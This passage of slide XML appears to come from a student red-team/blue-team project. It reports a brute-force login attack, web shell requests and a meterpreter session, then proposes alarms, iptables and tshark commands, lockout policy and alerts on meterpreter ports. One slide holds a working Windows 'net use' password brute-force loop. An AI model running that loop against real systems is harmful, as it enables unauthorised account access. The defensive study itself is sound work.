              <a:rPr lang="en" sz="1200"/>
              <a:t> credentials. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1226" name="Google Shape;1226;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="285650" y="741312"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1227" name="Google Shape;1227;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="2286"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="1643325"/>
            <a:ext cx="5943600" cy="3190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33" name="Google Shape;1233;p74"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="1234" name="Google Shape;1234;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285650" y="741300"/>
            <a:ext cx="91686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Overall, 14,553 requests were made during this attack. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>It took 8,044 requests in order for the brute force attack to successfully find the correct credential for authentication. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1235" name="Google Shape;1235;p74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="276700" y="741312"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1236" name="Google Shape;1236;p74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="1874"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1467775"/>
            <a:ext cx="5943600" cy="3190875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1237" name="Google Shape;1237;p74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="1739"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3797650" y="1920600"/>
            <a:ext cx="5346349" cy="3228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43" name="Google Shape;1243;p75"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="1244" name="Google Shape;1244;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285650" y="741300"/>
            <a:ext cx="91686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There were 368 requests made to “/webdav” folder. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>The following files “shell.php” &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“passwd.php” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>were requested 174 &amp; 68 times respectively.  </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1245" name="Google Shape;1245;p75"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="285650" y="741312"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1246" name="Google Shape;1246;p75"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="50898" r="0" t="3025"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1467800"/>
            <a:ext cx="2918350" cy="3238500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1247" name="Google Shape;1247;p75"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="3920"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3285700" y="1540650"/>
            <a:ext cx="5791200" cy="2384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Analysis: Proving Company Server was Compromised </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1253" name="Google Shape;1253;p76"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1254" name="Google Shape;1254;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="2591"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367425" y="1284250"/>
            <a:ext cx="8409300" cy="3632400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1255" name="Google Shape;1255;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="321825" y="684625"/>
            <a:ext cx="845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Screenshot below shows a meterpreter session was successfully created between the attacking machine and the target thus allowing the attacker to upload/download files at will.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pic>
        <p:nvPicPr>
          <p:cNvPr id="1260" name="Google Shape;1260;p77"/>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61" name="Google Shape;1261;p77"/>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62" name="Google Shape;1262;p7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68" name="Google Shape;1268;p78"/>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port scans?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Abnormal number of TCP handshakes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Abnormal amount of inbound ICMP packets</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Decrease in network bandwidth </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>To set any of the above alarms a baseline needs to be first established based on the environment’s conditions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1269" name="Google Shape;1269;p78"/>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configurations can be set on the host to mitigate port scans?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Setup “tarpits” to slow network scanning</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Block all inbound ICMP packets</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Setup a Unified Threat Management system </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Describe the solution. If possible, provide required command lines. </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>iptables -A INPUT --proto icmp -j DROP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-A ufw-before-input -p icmp --icmp-type echo-request -j DROP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>cpdump -tttt -n -vv </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>netstat -ac 5 | rep tcp </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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75" name="Google Shape;1275;p79"/>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unauthorized access?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Create an IDS  rule that monitors foreign IP addresses attempting to access the hidden directory </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Create an IDS rule that detects abnormal “GET” requests </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>involving</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the URI path of the hidden directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>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04800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To set any of the above alarms a baseline needs to be first established based on the environment’s conditions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1276" name="Google Shape;1276;p79"/>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unwanted access?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Limit the amount of symbolic links to reduce the likelihood of successful directory traversal attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Whitelist only the CEO’s work IP and home IP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Describe the solution. If possible, provide the required command lines. </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Install Intrusion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>system</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Adjust firewall with whitelist</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Utilize ingress filtering to validate incoming packets </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tshark -R http.request -T fields -E separator=’;’ -e http.host -e http.request.uri</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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82" name="Google Shape;1282;p80"/>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brute force attacks?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use IDS to monitor failed login attempts</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Create custom scripts to analyze for abnormal number password attempts</a:t>
            </a:r>
            <a:endParaRPr/>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17500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To set any of the above alarms a baseline needs to be first established based on the environment’s conditions</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1283" name="Google Shape;1283;p80"/>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brute force attacks?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Set a lockout time for the threshold of failed login attempts</a:t>
            </a:r>
            <a:endParaRPr/>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the required command line(s). </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Adjust Account lockout threshold policy, Windows security suggests a starting value of 10</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>or /f %i in (&lt;PASSWORD FILE NAME&gt;) do @echo %i &amp; net use \\&lt;TARGET IP ADDRESS&gt; %i /u:&lt;USER NAME&gt; 2&gt;nul &amp;&amp; pause</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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89" name="Google Shape;1289;p81"/>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access to this directory?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Setting a UTM system or IDS/IPS can be used to monitor for any external connections/sessions created </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A time of day access alarm should also be set to further prevent unwanted access</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04800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Any connection made through common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> ports (4444/3389/5555/3790) should immediately notify a security admin </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Any abnormal outgoing network should likewise notify a security admin  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1290" name="Google Shape;1290;p8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control access?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Once whitelist has been set for CEO’s IP addresses all other IP’s will be blocked </a:t>
            </a:r>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the required command line(s). </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
